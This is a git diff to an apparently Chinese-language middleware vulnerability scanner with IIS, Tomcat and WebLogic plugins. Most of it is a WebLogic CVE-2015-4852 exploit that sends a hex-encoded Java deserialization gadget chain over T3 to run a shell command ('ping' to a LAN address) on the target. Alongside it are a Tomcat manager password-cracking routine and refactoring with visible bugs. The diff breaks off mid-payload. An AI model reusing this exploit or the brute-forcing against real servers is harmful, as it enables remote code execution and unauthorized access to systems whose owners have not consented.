diff --git a/N-MiddlewareScan.py b/N-MiddlewareScan.py index b3ab397..d7498b1 100644 --- a/N-MiddlewareScan.py +++ b/N-MiddlewareScan.py @@ -4,18 +4,20 @@ #blog:http://www.youknowi.xin import sys import os +import re import argparse import traceback import config +import multiprocessing from concurrent.futures import ThreadPoolExecutor from plugins import plugins #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 class MiddlewareScan(object): - def __init__(self,arg,ThreadNum): + def __init__(self,arg,config): self.arg=arg - self.ThreadNum=ThreadNum + self.config=config def run(self): - P = plugins.plugins(self.arg,self.ThreadNum) + P = plugins.plugins(self.arg,self.config) P.run() def main(): arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') @@ -24,31 +26,44 @@ def main(): arg.add_argument('-p', '--options', help='options', dest='options') arg.add_argument('-t', '--thread', help='thread num', dest='thread') arg = arg.parse_args() + if len(sys.argv)<=2: + os.system("python "+sys.argv[0]+" -h") + exit() + print("开始检测中间件相关漏洞:") if arg.thread: config.ThreadNum=arg.thread if not arg.options: arg.options="all" if arg.url: + if not re.match(r'^https?:/{2}\w.+$', url): + print("输入标准的url,如:http://www.baidu.com") + exit() try: S=MiddlewareScan(arg,config) S.run() except Exception: print(traceback.print_exc()) if arg.file: + multiprocessing_list=[] + f = open(arg.file, encoding="utf-8") + for url in f.readlines(): + url = url.rstrip("\n") + arg.url = url + if not re.match(r'^https?:/{2}\w.+$', url): + if not url.startswith("http"): + arg.url="http://"+url + S = MiddlewareScan(arg, config) + multiprocessing_list.append(S.run()) + f.close() + pool=multiprocessing.Pool(config.Process) try: - with open(arg.file,encoding="utf-8") as f: - with ThreadPoolExecutor(config.ThreadNum) as excetor: - for url in f.readlines(): - try: - url=url.rstrip("\n") - S=MiddlewareScan(arg,config) - excetor.submit(S.run()) - except Exception: - pass - f.close() + #pool.apply_async(multiprocessing_list) + for i in multiprocessing_list: + pool.apply_async(i) + pool.close() + pool.join() except Exception: print(traceback.print_exc()) print("\n\n相关漏洞检测完成。") if __name__ == '__main__': - print("开始检测中间件相关漏洞:") -main() \ No newline at end of file + main() \ No newline at end of file diff --git a/__pycache__/config.cpython-37.pyc b/__pycache__/config.cpython-37.pyc index 9cdb7ba..6b1067e 100644 Binary files a/__pycache__/config.cpython-37.pyc and b/__pycache__/config.cpython-37.pyc differ diff --git a/config.py b/config.py index af1cdab..28433e9 100644 --- a/config.py +++ b/config.py @@ -1,4 +1,5 @@ ThreadNum=50 +Process=30 Timeout=6 port=80 #linux diff --git a/plugins/IIS_special_plugin_.py b/plugins/IIS_special_plugin_.py index 0cd709b..895c479 100644 --- a/plugins/IIS_special_plugin_.py +++ b/plugins/IIS_special_plugin_.py @@ -38,5 +38,8 @@ def IIS_shortname_Scanner(url): except Exception as e: raise Exception('[is_vul.Exception] %s' % str(e)) def IIS_special_plugin_(arg,config): - IIS_PUT(arg,config) - IIS_shortname_Scanner(arg.url) \ No newline at end of file + try: + IIS_PUT(arg,config) + IIS_shortname_Scanner(arg.url) + except Exception: + pass \ No newline at end of file diff --git a/plugins/__init__.py b/plugins/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc index d1e159d..26b24af 100644 Binary files a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc and b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/__init__.cpython-37.pyc b/plugins/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..fbf46de Binary files /dev/null and b/plugins/__pycache__/__init__.cpython-37.pyc differ diff --git a/plugins/__pycache__/plugins.cpython-37.pyc b/plugins/__pycache__/plugins.cpython-37.pyc index cad9bb6..12502d8 100644 Binary files a/plugins/__pycache__/plugins.cpython-37.pyc and b/plugins/__pycache__/plugins.cpython-37.pyc differ diff --git a/plugins/__pycache__/special_plugin_.cpython-37.pyc b/plugins/__pycache__/special_plugin_.cpython-37.pyc index b10a917..2c353c5 100644 Binary files a/plugins/__pycache__/special_plugin_.cpython-37.pyc and b/plugins/__pycache__/special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc b/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc index 626e91d..2fa1511 100644 Binary files a/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc and b/plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc differ diff --git a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc index 49f4857..983bd45 100644 Binary files a/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc and b/plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc differ diff --git a/plugins/special_plugin_.py b/plugins/special_plugin_.py index 936b308..8ac4fc4 100644 --- a/plugins/special_plugin_.py +++ b/plugins/special_plugin_.py @@ -22,7 +22,7 @@ def special_plugin_(arg,config): try: thread.start() except Exception as e: - print(e) + pass for t in threads: t.join() diff --git a/plugins/tomcat_special_plugin_.py b/plugins/tomcat_special_plugin_.py index 3b79907..4b011f2 100644 --- a/plugins/tomcat_special_plugin_.py +++ b/plugins/tomcat_special_plugin_.py @@ -6,6 +6,7 @@ import uuid from termcolor import cprint from urllib.parse import urlparse from concurrent.futures import ThreadPoolExecutor +import threading def requests_post(url,username,password,flag_list): try: login_url = url + '/manager/html' @@ -79,6 +80,14 @@ class Exploit: cprint("[-] " + __file__ + "====>连接超时", "cyan") def tomcat_special_plugin_(arg,config): - Exploit().attack(arg.url) - crack_password(arg,config) + threads=[] + threads.append(threading.Thread(Exploit().attack(arg.url))) + threads.append(threading.Thread(crack_password(arg,config))) + for thread in threads: + try: + thread.start() + except Exception: + pass + for j in threads: + j.join() diff --git a/plugins/weblogic_poc/CVE_2015_4852.py b/plugins/weblogic_poc/CVE_2015_4852.py index d2982d1..3154bd6 100644 --- a/plugins/weblogic_poc/CVE_2015_4852.py +++ b/plugins/weblogic_poc/CVE_2015_4852.py @@ -13,45 +13,43 @@ import struct from binascii import unhexlify def run(rip,rport): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server_address = (rip,rport) - sock.connect(server_address) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(7) + server_address = (rip, rport) + sock.connect(server_address) - headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' - sock.sendall(headers) + headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' + sock.sendall(headers) - data = sock.recv(1024) + data = sock.recv(1024) - chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + chunk1 = '\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" - chunk2 = "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\